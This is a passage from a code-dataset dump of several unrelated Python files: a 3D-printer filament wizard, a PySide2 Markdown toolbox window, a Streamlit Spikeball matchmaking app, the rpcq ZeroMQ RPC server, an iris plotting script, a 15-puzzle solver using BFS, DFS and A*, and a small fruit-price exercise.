title=roboprinter.lang.pack['Filament_Wizard']['Title_25'], back_destination=back_destination, content=c)\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n\n #extrude a little bit before retracting\n roboprinter.printer_instance._printer.extrude(20.0)\n self.extrude_event = Clock.schedule_interval(self.retract, 1)\n\n\n # back_button deletes Second Screen, as back destination is first screen\n # second_screen = self.sm.get_screen(self.name+'[1]')\n # delete_second = partial(self.sm.remove_widget, second_screen)\n # this_screen.ids.back_button.bind(on_press=delete_second)\n\n def fourth_screen(self, *args):\n \"\"\"\n Load filament screen:\n Display instructions to user -- Load filament\n Display button that will open fifth screen\n \"\"\"\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_35']\n back_dest = self.name+'[2]'\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_24']\n back_dest = self.name\n\n if self.extrude_event != None:\n self.end_extrude_event()\n c = Filament_Wizard_4_5(self.fifth_screen)\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[3]', title=_title, back_destination=back_destination, content=c)\n\n def fifth_screen(self, *args):\n \"\"\"\n Final screen / Confirm successful load:\n Extrude filament\n Display instruction to user -- Press okay when you see plastic extruding\n Display button that will move_to_main() AND stop extruding filament\n \"\"\"\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_45']\n back_dest = self.name+'[3]'\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_34']\n back_dest = self.name+'[3]'\n\n c = Filament_Wizard_5_5(self.end_wizard)\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[4]', title=_title, back_destination=back_destination, content=c)\n\n #end the event before starting it again\n if self.extrude_event != None:\n self.end_extrude_event()\n 
self.extrude_event = Clock.schedule_interval(self.extrude, 1)\n\n def extrude(self, *args):\n # wrapper that can accept the data pushed to it by Clock.schedule_interval when called\n if self.sm.current == 'filamentwizard[4]':\n roboprinter.printer_instance._printer.extrude(5.0)\n else:\n self.end_extrude_event()\n Logger.info(\"Canceling due to Screen change\")\n def retract(self, *args):\n if self.sm.current == 'filamentwizard[2]':\n roboprinter.printer_instance._printer.extrude(-5.0)\n else:\n self.end_extrude_event()\n Logger.info(\"Canceling due to Screen change\")\n\n def retract_after_session(self, *args):\n roboprinter.printer_instance._printer.extrude(-10.0)\n\n def end_extrude_event(self, *args):\n self.extrude_event.cancel()\n\n def end_wizard(self, *args):\n\n \n\n \n self.extrude_event.cancel()\n c = Filament_Wizard_Finish()\n\n if self.load_or_change == 'CHANGE':\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_55']\n\n else:\n _title = roboprinter.lang.pack['Filament_Wizard']['Title_44']\n\n #set the E position back to it's original position\n if self.E_Position != None:\n roboprinter.printer_instance._printer.commands(\"G92 E\" + str(self.E_Position)) \n\n #if it is printing or paused don't cool down\n if not self.is_printing and not self.is_paused:\n #retract 10mm\n self.retract_after_session()\n\n #cooldown\n roboprinter.printer_instance._printer.commands('M104 S0')\n roboprinter.printer_instance._printer.commands('M140 S0')\n\n back_destination = roboprinter.robo_screen()\n self.sm._generate_backbutton_screen(name=self.name+'[5]', title=_title, back_destination=back_destination, content=c)\n\n\n def _generate_layout(self, l_text, btn_text, f):\n \"\"\"\n Layouts are similar in fashion: Text and Call to Action button\n creates layout with text and button and binds f to button\n \"\"\"\n layout = BoxLayout(orientation='vertical')\n btn = Button(text=btn_text, font_size=30)\n l = Label(text=l_text, font_size=30)\n btn.bind(on_press=f)\n layout.add_widget(l)\n layout.add_widget(btn)\n return layout\n","repo_name":"mcecchi/SuperOcto","sub_path":"RoboLCD/RoboLCD/lcd/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70953418001","text":"# -*- coding: UTF-8 -*-\n\nimport sys\n\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\n\nfrom moduels.component.NormalValue import 常量\nfrom moduels.gui.Tab_ClearAttatchment import Tab_ClearAttatchment\nfrom moduels.gui.Tab_Config import Tab_Config\n# try:\nfrom moduels.gui.Tab_CopyMdFile import Tab_CopyMdFile\nfrom moduels.gui.Tab_Help import Tab_Help\nfrom moduels.gui.Tab_LocalizeMdFile import Tab_LocalizeMdFile\nfrom moduels.gui.Tab_Stdout import Tab_Stdout\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.loadStyleSheet()\n self.initElements() # 先初始化各个控件\n self.initSlots() # 再将各个控件连接到信号槽\n self.initLayouts() # 然后布局\n self.initValues() # 再定义各个控件的值\n\n\n # self.setWindowState(Qt.WindowMaximized)\n # sys.stdout = Stream(newText=self.onUpdateText)\n\n def initElements(self):\n self.状态栏 = self.statusBar()\n self.标签页控件 = QTabWidget() # 定义中心控件为多 tab 页面\n\n self.设置标签页 = Tab_Config()\n\n self.复制功能标签页 = Tab_CopyMdFile()\n self.离线化功能标签页 = Tab_LocalizeMdFile()\n self.清理功能标签页 = Tab_ClearAttatchment()\n self.控制台标签页 = Tab_Stdout()\n self.帮助标签页 = Tab_Help()\n\n def initSlots(self):\n self.复制功能标签页.状态栏消息.connect(lambda 消息, 时间: 
self.状态栏.showMessage(消息, 时间))\n self.离线化功能标签页.状态栏消息.connect(lambda 消息, 时间: self.状态栏.showMessage(消息, 时间))\n self.清理功能标签页.状态栏消息.connect(lambda 消息, 时间: self.状态栏.showMessage(消息, 时间))\n\n def initLayouts(self):\n self.setCentralWidget(self.标签页控件)\n self.标签页控件.addTab(self.复制功能标签页, self.tr('复制'))\n self.标签页控件.addTab(self.离线化功能标签页, self.tr('离线化'))\n self.标签页控件.addTab(self.清理功能标签页, self.tr('清理'))\n # self.标签页控件.addTab(self.控制台标签页, self.tr('控制台'))\n self.标签页控件.addTab(self.设置标签页, self.tr('设置'))\n self.标签页控件.addTab(self.帮助标签页, self.tr('帮助'))\n\n def initValues(self):\n # self.窗口标题 = 'MarkDown 工具箱'\n 常量.状态栏 = self.状态栏\n self.setWindowTitle('MarkDown 工具箱')\n self.setWindowIcon(QIcon(常量.图标路径))\n self.setWindowFlag(Qt.WindowStaysOnTopHint) # 始终在前台\n self.show()\n\n def loadStyleSheet(self):\n try:\n try:\n with open(常量.样式文件, 'r', encoding='utf-8') as style:\n self.setStyleSheet(style.read())\n except:\n with open(常量.样式文件, 'r', encoding='gbk') as style:\n self.setStyleSheet(style.read())\n except:\n QMessageBox.warning(self, self.tr('主题载入错误'), self.tr('未能成功载入主题,请确保软件 misc 目录有 \"style.css\" 文件存在。'))\n\n def keyPressEvent(self, event) -> None:\n # 在按下 F5 的时候重载 style.css 主题\n if (event.key() == Qt.Key_F5):\n self.loadStyleSheet()\n self.状态栏.showMessage('已成功更新主题', 800)\n\n def closeEvent(self, event):\n \"\"\"Shuts down application on close.\"\"\"\n # Return stdout to defaults.\n if 常量.关闭时隐藏到托盘:\n event.ignore()\n self.hide()\n else:\n sys.stdout = sys.__stdout__\n super().closeEvent(event)\n","repo_name":"HaujetZhao/Markdown-Toolbox","sub_path":"src/moduels/gui/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"zh","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"} +{"seq_id":"6295009615","text":"import streamlit as st\n\nfrom matchmaking.data import Player\nfrom matchmaking.generator import get_most_diverse_matchups\n\n\ndef init_state():\n\n if \"players\" not in st.session_state:\n st.session_state.players = []\n\n if 'matchups' not in st.session_state:\n st.session_state.matchups = []\n \n if 'matchup_gen_score' not in st.session_state:\n st.session_state.matchup_gen_score = 0.0\n \n if 'results' not in st.session_state:\n st.session_state.results = {}\n\n if 'NUM_ITERATIONS' not in st.session_state:\n st.session_state.NUM_ITERATIONS = 10000\n\n if 'NUM_ROUNDS' not in st.session_state:\n st.session_state.NUM_ROUNDS = 10\n\n if 'NUM_FIELDS' not in st.session_state:\n st.session_state.NUM_FIELDS = 1\n\n if 'WEIGHT_METRIC_CONFIG' not in st.session_state:\n st.session_state.WEIGHT_METRIC_CONFIG = {}\n \n\n\ndef input_new_players():\n st.write(\"#### Player selection\")\n new_player = st.text_input('New player name (or list of players seperated by comma):', key='input_new_player_name', placeholder=\"Name OR Name1,Name2,Name3,Name4,...\")\n\n st.button('Add player', key='button_add_player',\n on_click=_submit_add_player, args=(new_player, ))\n\n st.write(\"Current players:\")\n st.write([str(x) for x in st.session_state.players])\n \ndef _submit_add_player(player_phrase: str):\n \n if player_phrase == \"\":\n st.warning(f\"Please insert a player name or a comma separated list of names.\")\n return\n \n if \",\" in player_phrase:\n players = player_phrase.split(\",\")\n else:\n players = [player_phrase]\n \n for player_name in players:\n player = Player(player_name)\n if player.get_unique_identifier() in [x.get_unique_identifier() for x in st.session_state.players]:\n st.warning(f'The name \"{player}\" already exists.')\n else:\n 
st.session_state.players.append(player)\n \ndef show_max_matchups():\n st.session_state.max_matchups = _calculate_max_matchups(len(st.session_state.players))\n st.write(\"Max possible amount of unique matchups:\", st.session_state.max_matchups)\n\ndef _calculate_max_matchups(num_players) -> int:\n\n n = num_players\n\n return int(((n * n - n) / 8) * (n * n - 5 * n + 6))\n\n\ndef configure():\n st.write(\"## Configuration\")\n \n input_new_players()\n \n st.write(\"#### Game Params\")\n st.session_state.NUM_ROUNDS = st.slider('Number of Rounds:', min_value=1, max_value=100, value=_get_default_num_rounds())\n st.session_state.NUM_FIELDS = st.slider('Number of Fields:', min_value=1, max_value=10, value=1)\n \n st.write(\"#### Optimization Params\")\n st.session_state.NUM_ITERATIONS = st.slider('Number of Optimization Iterations:', min_value=1000, max_value=100000, value=10000)\n \n st.write(\"#### Metric Weights\")\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_not_playing_players_index\"] = 100000.0\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_played_matches_index\"] = 10000.0\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_player_engagement_fairness_index\"] = st.slider('Weight for Global Player Engagement Fairness Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_teammate_succession_index\"] = st.slider('Weight for Global Teammate Succession Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_enemy_team_succession_index\"] = st.slider('Weight for Global Enemy Team Succession Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_player_engagement_index\"] = st.slider('Weight for Global Player Engagement Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_teammate_variety_index\"] = st.slider('Weight for Global Teammate Variety Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_enemy_team_variety_index\"] = st.slider('Weight for Global Enemy Team Variety Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_break_occurrence_index\"] = st.slider('Weight for Global Break Occurrence Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_break_shortness_index\"] = st.slider('Weight for Global Break Shortness Index:', 0.0, 100.0, 5.0)\n st.write(f\"Weight for Global Not Playing Players Index [CONSTANT]:\", st.session_state.WEIGHT_METRIC_CONFIG[\"global_not_playing_players_index\"])\n st.write(f\"Weight for Global Played Matches Index [CONSTANT]:\", st.session_state.WEIGHT_METRIC_CONFIG[\"global_played_matches_index\"])\n\ndef _get_default_num_rounds() -> int:\n if st.session_state.max_matchups > 0:\n return st.session_state.max_matchups\n else:\n return 10\n\ndef matchup_generation():\n st.write(\"## Matchup generation\")\n \n show_max_matchups()\n\n st.button('Generate matchups [may take a while...]', key='button_gen_10_matchup',\n on_click=_gen_matchup_batch)\n \n st.write(st.session_state.matchups)\n \n st.write(\"Score (lower is better):\", st.session_state.matchup_gen_score)\n \ndef _gen_matchup_batch():\n \n if len(st.session_state.players) < 4:\n st.warning(f\"Not enough players to generate matchups: {len(st.session_state.players)}. 
Four players are needed at least.\")\n return\n \n weight_metric_config = [ (value, key) for key, value in st.session_state.WEIGHT_METRIC_CONFIG.items()]\n \n print(weight_metric_config)\n \n best_matchup_config, best_score, results = get_most_diverse_matchups(\n st.session_state.players, \n st.session_state.NUM_ROUNDS, \n st.session_state.NUM_FIELDS, \n st.session_state.NUM_ITERATIONS, \n weight_metric_config\n )\n \n st.session_state.matchups = best_matchup_config\n st.session_state.matchup_gen_score = best_score\n st.session_state.results = results\n\ndef additional_info():\n st.write(\"#### Additional Result Info\")\n st.write(\"Matchup Statistics:\", st.session_state.results)\n\ndef main():\n\n init_state()\n\n st.write(\"\"\"\n # Spikeball WebApp\n Generate optimal matchups.\n \"\"\")\n \n matchup_generation()\n configure()\n additional_info()\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"TimoIllusion/spikeball-matchmaking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13842910043","text":"import asyncio\nimport logging\nfrom asyncio import AbstractEventLoop\nfrom typing import Callable\nfrom datetime import datetime\n\nimport zmq.asyncio\n\nfrom rpcq._base import to_msgpack, from_msgpack\nfrom rpcq._spec import RPCSpec\nfrom rpcq.messages import RPCRequest\n\n_log = logging.getLogger(__name__)\n\n\nclass Server:\n \"\"\"\n Server that accepts JSON RPC calls through a socket.\n \"\"\"\n def __init__(self, rpc_spec: RPCSpec = None, announce_timing: bool = False,\n serialize_exceptions: bool = True):\n \"\"\"\n Create a server that will be linked to a socket\n\n :param rpc_spec: JSON RPC spec\n :param announce_timing:\n :param serialize_exceptions: If set to True, this Server will catch all exceptions occurring\n internally to it and, when possible, communicate them to the interrogating Client. If\n set to False, this Server will re-raise any exceptions it encounters (including, but not\n limited to, those which might occur through method calls to rpc_spec) for Server's\n local owner to handle.\n\n IMPORTANT NOTE: When set to False, this *almost definitely* means an unrecoverable\n crash, and the Server should then be _shutdown().\n \"\"\"\n self.announce_timing = announce_timing\n self.serialize_exceptions = serialize_exceptions\n\n self.rpc_spec = rpc_spec if rpc_spec else RPCSpec(serialize_exceptions=serialize_exceptions)\n self._exit_handlers = []\n\n self._socket = None\n\n def rpc_handler(self, f: Callable):\n \"\"\"\n Add a function to the server. It will respond to JSON RPC requests with the corresponding method name.\n This can be used as both a side-effecting function or as a decorator.\n\n :param f: Function to add\n :return: Function wrapper (so it can be used as a decorator)\n \"\"\"\n return self.rpc_spec.add_handler(f)\n\n def exit_handler(self, f: Callable):\n \"\"\"\n Add an exit handler - a function which will be called when the server shuts down.\n\n :param f: Function to add\n \"\"\"\n self._exit_handlers.append(f)\n\n async def run_async(self, endpoint: str):\n \"\"\"\n Run server main task (asynchronously).\n\n :param endpoint: Socket endpoint to listen to, e.g. 
\"tcp://*:1234\"\n \"\"\"\n self._connect(endpoint)\n\n # spawn an initial listen task\n listen_task = asyncio.ensure_future(self._socket.recv_multipart())\n task_list = [listen_task]\n\n while True:\n dones, pendings = await asyncio.wait(task_list, return_when=asyncio.FIRST_COMPLETED)\n\n # grab one \"done\" task to handle\n task_list, done_list = list(pendings), list(dones)\n done = done_list.pop()\n task_list += done_list\n\n if done == listen_task:\n try:\n # empty_frame may either be:\n # 1. a single null frame if the client is a REQ socket\n # 2. an empty list (ie. no frames) if the client is a DEALER socket\n identity, *empty_frame, msg = done.result()\n request = from_msgpack(msg)\n\n # spawn a processing task\n task_list.append(asyncio.ensure_future(\n self._process_request(identity, empty_frame, request)))\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in Server run loop during request '\n 'reception: {}'.format(str(e)))\n else:\n raise e\n finally:\n # spawn a new listen task\n listen_task = asyncio.ensure_future(self._socket.recv_multipart())\n task_list.append(listen_task)\n else:\n # if there's been an exception during processing, consider reraising it\n try:\n done.result()\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in Server run loop during request '\n 'dispatch: {}'.format(str(e)))\n else:\n raise e\n\n def run(self, endpoint: str, loop: AbstractEventLoop = None):\n \"\"\"\n Run server main task.\n\n :param endpoint: Socket endpoint to listen to, e.g. \"tcp://*:1234\"\n :param loop: Event loop to run server in (alternatively just use run_async method)\n \"\"\"\n if not loop:\n loop = asyncio.get_event_loop()\n\n try:\n loop.run_until_complete(self.run_async(endpoint))\n except KeyboardInterrupt:\n self._shutdown()\n\n def stop(self):\n \"\"\"\n DEPRECATED\n \"\"\"\n pass\n\n def _shutdown(self):\n \"\"\"\n Shut down the server.\n \"\"\"\n for exit_handler in self._exit_handlers:\n exit_handler()\n\n if self._socket:\n self._socket.close()\n self._socket = None\n\n def _connect(self, endpoint: str):\n \"\"\"\n Connect the server to an endpoint. Creates a ZMQ ROUTER socket for the given endpoint.\n\n :param endpoint: Socket endpoint, e.g. 
\"tcp://*:1234\"\n \"\"\"\n if self._socket:\n raise RuntimeError('Cannot run multiple Servers on the same socket')\n\n context = zmq.asyncio.Context()\n self._socket = context.socket(zmq.ROUTER)\n self._socket.bind(endpoint)\n\n _log.info(\"Starting server, listening on endpoint {}\".format(endpoint))\n\n async def _process_request(self, identity: bytes, empty_frame: list, request: RPCRequest):\n \"\"\"\n Executes the method specified in a JSON RPC request and then sends the reply to the socket.\n\n :param identity: Client identity provided by ZeroMQ\n :param empty_frame: Either an empty list or a single null frame depending on the client type\n :param request: JSON RPC request\n \"\"\"\n try:\n _log.debug(\"Client %s sent request: %s\", identity, request)\n start_time = datetime.now()\n reply = await self.rpc_spec.run_handler(request)\n if self.announce_timing:\n _log.info(\"Request {} for {} lasted {} seconds\".format(\n request.id, request.method, (datetime.now() - start_time).total_seconds()))\n\n _log.debug(\"Sending client %s reply: %s\", identity, reply)\n await self._socket.send_multipart([identity, *empty_frame, to_msgpack(reply)])\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in _process_request')\n else:\n raise e\n\n","repo_name":"guilhermemoriggidesouza/api-flask-to-reuse","sub_path":"env/Lib/site-packages/rpcq/_server.py","file_name":"_server.py","file_ext":"py","file_size_in_byte":6908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19551028243","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport seaborn as sns;\nsns.set(style=\"ticks\", color_codes=True)\n\nimport pandas as pd\npd.set_option('precision', 2) # 2 decimal places\npd.set_option('display.max_rows', 20)\npd.set_option('display.max_columns', 30)\npd.set_option('display.width', 100) # wide windows\n\n\n\nimport sklearn\nfrom sklearn.datasets import load_iris\niris = load_iris()\n\n# Extract numpy arrays\nX = iris.data \ny = iris.target\n\n\n# Convert to pandas dataframe \ndf = pd.DataFrame(data=X, columns=['sl', 'sw', 'pl', 'pw'])\n# create column for labels\ndf['label'] = pd.Series(iris.target_names[y], dtype='category')\n\n\n# 2d scatterplot\n#https://seaborn.pydata.org/generated/seaborn.pairplot.html\n\n# Make a dataframe with nicer labels for printing\n#iris_df = sns.load_dataset(\"iris\")\niris_df = df.copy()\niris_df.columns = iris['feature_names'] + ['label'] \n\n\ng = sns.pairplot(iris_df, vars = iris_df.columns[0:4], hue=\"label\")\nplt.tight_layout()\nplt.savefig(\"../figures/iris_pairplot.pdf\")\nplt.show()\n\nif 0:\n # pick ugly colors to match iris_dtree.py\n palette = {'setosa': 'red', 'versicolor': 'yellow', 'virginica': 'blue' }\n g = sns.pairplot(iris_df, vars = iris_df.columns[0:4] ,\n hue=\"label\", palette=palette)\n plt.savefig(\"../figures/iris_pairplot-ryb.pdf\")\n plt.show()\n\nsns.stripplot(x=\"label\", y=\"sl\", data=df, jitter=True)\nplt.savefig('../figures/iris_sepal_length_strip_plot.pdf', dpi=300);","repo_name":"uniontm/pyprobml","sub_path":"scripts/iris_plot.py","file_name":"iris_plot.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"27397860460","text":"import sys\nimport re\nimport os\nfrom copy import deepcopy\nfrom time import perf_counter_ns\n\nrecursionLimit = 20\n\nfinalBoard = []\n\nvisitedBoardStates = []\n\ndef fillFinalBoard(size):\n\n 
currentNumber = 1\n\n for x in range(size[0]):\n row = []\n\n for y in range(size[1]):\n row.append(currentNumber)\n currentNumber += 1\n\n finalBoard.append(row)\n\n finalBoard[-1][-1] = 0\n\n\n\ndef validatePath(board, move):\n\n for x, y in ((row, column) for row in range(len(board)) for column in range(len(board[0]))):\n if not board[x][y]:\n break\n \n if move == 'L':\n if y-1 < 0 : return None, -1\n temp = board[x][y-1]\n board[x][y-1] = 0\n board[x][y] = temp\n y -= 1\n elif move == 'R' :\n if y+1 >= len(board[0]) : return None, -1\n temp = board[x][y+1]\n board[x][y+1] = 0\n board[x][y] = temp\n y += 1\n elif move == 'U' :\n if x-1 < 0 : return None, -1\n temp = board[x-1][y]\n board[x-1][y] = 0\n board[x][y] = temp\n x -= 1\n else :\n if x+1 >= len(board) : return None, -1\n temp = board[x+1][y]\n board[x+1][y] = 0\n board[x][y] = temp\n x += 1\n\n if hash(str(board)) in visitedBoardStates:\n return None, -1\n\n visitedBoardStates.append(hash(str(board)))\n \n if not hash(str(board)) == hash(str(finalBoard)):\n return board, 0\n\n return board, 1\n\n\n\n\ndef bfs(param, puzzle):\n\n visitedBoardStates.append(hash(str(puzzle)))\n processedStates = 0\n\n # queue of paths\n paths = []\n puzzles = [deepcopy(puzzle)]\n\n for direction in param: \n paths.append([direction])\n\n # do until there are paths to test\n while paths:\n\n currentPath = paths[0]\n del paths[0]\n\n if not processedStates % 4:\n currentPuzzle = puzzles[0]\n del puzzles[0]\n\n new_puzzle, validate = validatePath(deepcopy(currentPuzzle), currentPath[-1])\n processedStates += 1\n\n if validate == 1:\n return currentPath, processedStates, len(currentPath)\n elif validate == -1:\n continue\n\n\n for direction in param:\n paths.append(currentPath + [direction])\n puzzles.append(new_puzzle)\n\n\n # when no viable path is found\n return None, processedStates, recursionLimit\n \n\ndef dfs(param, puzzle, currentRecursion = 0, maxRecursion = 0, processedStates = 0, path = []):\n\n currentRecursion += 1\n\n if currentRecursion > maxRecursion:\n maxRecursion = recursionLimit\n\n if currentRecursion > recursionLimit:\n # maxRecursion = recursionLimit\n return None, processedStates, maxRecursion\n \n for direction in param:\n newPath = deepcopy(path)\n newPath.append(direction)\n new_puzzle, validate = validatePath(deepcopy(puzzle), direction)\n processedStates += 1\n if validate == 1:\n return deepcopy(newPath), processedStates, maxRecursion\n elif validate == -1:\n continue\n\n resultPath, processedStates, maxRecursion = dfs(param, deepcopy(new_puzzle), deepcopy(currentRecursion), maxRecursion, processedStates, deepcopy(newPath))\n\n if resultPath:\n return resultPath, processedStates, maxRecursion\n \n return None, processedStates, maxRecursion\n \n\ndef manh(puzzle):\n distance = 0\n current_value = 0\n\n for i in range(len(puzzle)):\n for j in range(len(puzzle[0])):\n tmp = puzzle[i][j]\n current_value += 1\n x = (tmp - 1) // len(puzzle)\n y = (tmp - 1) % len(puzzle[0])\n if tmp == 0:\n x = len(puzzle) - 1\n y = len(puzzle[0]) - 1\n distance += abs(i - x) + abs(j - y)\n\n return distance\n\n\ndef hamm(puzzle):\n distance = 0\n current_value = 0\n\n for i in range(len(puzzle)):\n for j in range(len(puzzle[0])):\n tmp = puzzle[i][j]\n current_value += 1\n if tmp == 0 and i == len(puzzle) - 1 and j == len(puzzle[0]) - 1:\n continue\n if tmp != current_value:\n distance += 1\n\n return distance\n\nclass Node():\n def __init__(self, puzzle, path):\n self.puzzle = puzzle\n self.path = path\n self.dist_from_start: int = 0\n 
self.aprox_dist_from_start: int = 0\n\ndef astr(param, puzzle):\n\n distance_func = manh if param == \"manh\" else hamm\n\n processedStates = 0\n\n state_scores = {}\n open_list: list[Node] = []\n open_list.append(Node(deepcopy(puzzle), []))\n\n while len(open_list) > 0:\n\n processedStates += 1\n\n current_node = open_list[0]\n for node in open_list:\n if node.aprox_dist_from_start < current_node.aprox_dist_from_start:\n current_node = node\n open_list.remove(current_node)\n\n if hash(str(current_node.puzzle)) == hash(str(finalBoard)):\n return current_node.path\n\n for direction in ['L','R','U','D']:\n new_puzzle, validate = validatePath(deepcopy(current_node.puzzle), direction)\n\n if validate == -1:\n continue\n elif validate == 1:\n result = deepcopy(current_node.path)\n result.append(direction)\n return result, processedStates, len(result)\n\n\n distance_from_start = current_node.dist_from_start + 1\n aprox_distance = distance_from_start + \\\n distance_func(new_puzzle)\n\n if (hash(str(new_puzzle)) not in state_scores) or (distance_from_start < state_scores[hash(str(new_puzzle))]):\n\n state_scores[hash(str(new_puzzle))] = distance_from_start\n newPath = deepcopy(current_node.path)\n newPath.append(direction)\n new_node = Node(new_puzzle, newPath)\n new_node.dist_from_start = distance_from_start\n new_node.aprox_dist_from_start = aprox_distance\n open_list.append(new_node)\n\n'''\n\npuzzleHandle = open(\"C:\\\\Users\\\\maste\\\\Desktop\\\\other\\\\SISE_15\\\\puzzles\\\\4x4_07_00008.txt\")\ngameSize = [int(x) for x in puzzleHandle.readline().split()]\ngameFrame = [[int(x) for x in line.split()] for line in puzzleHandle]\n\nfillFinalBoard(gameSize)\n\n# visitedBoardStates.append(hash(str(gameFrame)))\nprint(dfs(\"LUDR\", gameFrame))\n#'''\n#'''\nif __name__ == '__main__':\n\n strategy = sys.argv[1]\n param = sys.argv[2]\n puzzleFile = sys.argv[3]\n solutionFile = sys.argv[4]\n statisticsFile = sys.argv[5]\n \n '''\n strategy = 'dfs'\n param = \"RDUL\"\n puzzleFile = \"4x4_07_00008.txt\"\n solutionFile = \"4x4_07_0008_dfs_LUDR_sol.txt\"\n statisticsFile = \"4x4_07_0008_dfs_LUDR_stats.txt\"\n '''\n \n\n if strategy not in ['bfs', 'dfs', 'astr']:\n raise Exception(\"Unknown strategy given.\")\n\n if strategy == 'astr' and param not in ['hamm', 'manh']:\n raise Exception(\"Unknown heuristic for A* strategy given.\")\n\n # elif not (re.match(r'^(?=.*R)(?=.*U)(?=.*L)(?=.*D).*$', param) and len(param) == 4):\n # raise Exception(\"Unknown search order given.\")\n\n # create directories if they don't exist\n if not os.path.exists(\"solutions\") : os.mkdir(\"solutions\")\n if not os.path.exists(\"solutions/\" + strategy) : os.mkdir(\"solutions/\" + strategy)\n if not os.path.exists(\"solutions/\" + strategy + \"/\" + param) : os.mkdir(\"solutions/\" + strategy + \"/\" + param)\n\n if not os.path.exists(\"statistics\") : os.mkdir(\"statistics\")\n if not os.path.exists(\"statistics/\" + strategy) : os.mkdir(\"statistics/\" + strategy)\n if not os.path.exists(\"statistics/\" + strategy + \"/\" + param) : os.mkdir(\"statistics/\" + strategy + \"/\" + param)\n\n path = None\n processedStates = None\n maxDepth = None\n\n puzzleFile = \"C:\\\\Users\\\\maste\\\\Desktop\\\\other\\\\SISE_15\\\\puzzles\\\\\" + puzzleFile\n\n puzzleHandle = open(puzzleFile)\n gameSize = [int(x) for x in puzzleHandle.readline().split()]\n gameFrame = [[int(x) for x in line.split()] for line in puzzleHandle]\n\n fillFinalBoard(gameSize)\n\n if strategy == \"bfs\":\n startTime = perf_counter_ns()\n path, processedStates, 
maxDepth = bfs(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n elif strategy == \"dfs\" :\n visitedBoardStates.append(hash(str(gameFrame)))\n startTime = perf_counter_ns()\n path, processedStates, maxDepth = dfs(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n else:\n startTime = perf_counter_ns()\n path, processedStates, maxDepth = astr(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n\n\n\n # startTime = perf_counter()\n # exec(\"path, processedStates, maxDepth = \" + strategy + \"(param, gameFrame)\")\n # finalTime = (perf_counter() - startTime) / 1000000\n\n visitedStates = len(visitedBoardStates)\n solutionLength = len(path) if path else -1\n\n f = open(\"solutions/\" + strategy + \"/\" + param + \"/\" + solutionFile, 'w')\n if path:\n f.write(str(solutionLength) + \"\\n\" + ''.join(path))\n else:\n f.write(str(solutionLength))\n f.close()\n\n f = open(\"statistics/\" + strategy + \"/\" + param + \"/\" + statisticsFile, 'w')\n if path:\n f.write(str(solutionLength) + \"\\n\" + str(visitedStates) + \"\\n\" + str(processedStates) + \"\\n\" + str(maxDepth) + \"\\n\" + str(round(finalTime, 3)))\n else:\n f.write(str(solutionLength) + \"\\n\" + str(visitedStates) + \"\\n\" + str(processedStates) + \"\\n\" + str(maxDepth) + \"\\n\" + str(round(finalTime, 3)))\n f.close()\n\n#'''","repo_name":"zeregzesis/uni","sub_path":"Sztuczna inteligencja i systemy ekpertowe/Piętnastka/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16739652681","text":"print(\"[1] apple\\n[2] pear\\n[3] orange\\n[4] grape\\n[0] exit\")\nlst=[0,3.0,2.5,4.1,10.2]\ninp=list(map(int,input().strip().split()))\nfor i in range(5):\n x=inp[i]\n if x==0:\n break\n elif 1<=x<=4:\n print(\"price = %.2f\"%lst[x])\n else:\n print(\"price = 0.00\")\n \n","repo_name":"toooooodo/python-programming","sub_path":"7-9 查询水果价格 (15 分).py","file_name":"7-9 查询水果价格 (15 分).py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"34683677129","text":"import numpy as np\nimport chainer\nimport chainer.functions as F\n\nfrom ..base_mesh_accelerator import 